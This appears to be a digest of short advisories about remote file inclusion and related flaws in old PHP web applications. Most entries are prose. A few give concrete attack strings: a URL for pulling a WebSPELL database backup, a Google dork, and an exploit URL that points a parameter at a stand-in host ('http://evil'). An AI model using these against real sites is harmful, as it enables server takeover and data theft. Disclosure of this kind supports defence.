A remote file include vulnerability exists in Vitrax Premodded phpBB. An attacker can exploit this vulnerability to include arbitrary files from remote locations by sending a specially crafted HTTP request containing directory traversal characters. This can be exploited to execute arbitrary PHP code by including files from external sources that contain malicious code.
An attacker can download the database backup of the WebSPELL CMS by accessing the URL http://[SITE]/[PATH]/admin/database.php?action=write&userID=1
A vulnerability exists in Popper v1.41 which allows remote attackers to include arbitrary files via a URL in the form parameter to childwindow.inc.php. This can be exploited to execute arbitrary PHP code by including a URL pointing to a malicious PHP script.
p4CMS version 1.05 is vulnerable to a remote file inclusion vulnerability due to a lack of proper sanitization of user-supplied input in the 'abs_pfad' parameter of the 'abf_js.php' script. An attacker can exploit this vulnerability by sending a malicious URL in the 'abs_pfad' parameter, which will be executed on the vulnerable server.
Poison NULL byte vulnerability for perl CGI applications was described in [1]. ShAnKaR noted, that same vulnerability also affects different PHP applications. An example of vulnerable applications are phpBB and punBB. Vulnerability can be used to upload or replace arbitrary files on server, e.g. PHP scripts, by adding 'poison NULL' (%00) to filename. In case of phpBB and punBB vulnerability can be exploited by changing location of avatar file and uploading avatar file with PHP code in EXIF data.
A vulnerability in PhpLinkExchange allows remote attackers to include arbitrary files from remote locations and execute arbitrary code. It is also possible to inject arbitrary web script or HTML via the msg parameter.
WTools v0.0.1-ALPH is vulnerable to a Remote File Include vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server, which will then include and execute the malicious file.
Invalid include function at fileloader.php on line at 5,6 and 7,the '$config["openi_dir"]' is not gurantee to including a files. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing an URL to the vulnerable fileloader.php script with the malicious code in the 'config[openi_dir]' parameter.
Input passed to the "path_to_folder" is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources. Google Dork; "powered by mcGalleryPRO" exploit : http://somehost/path_to_mcgallerypro/random2.php?path_to_folder=http://evil
Open Bulletin Board 1.0.8 is vulnerable to multiple remote file include vulnerabilities. An attacker can exploit these vulnerabilities by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary code on the server.
Services By CQR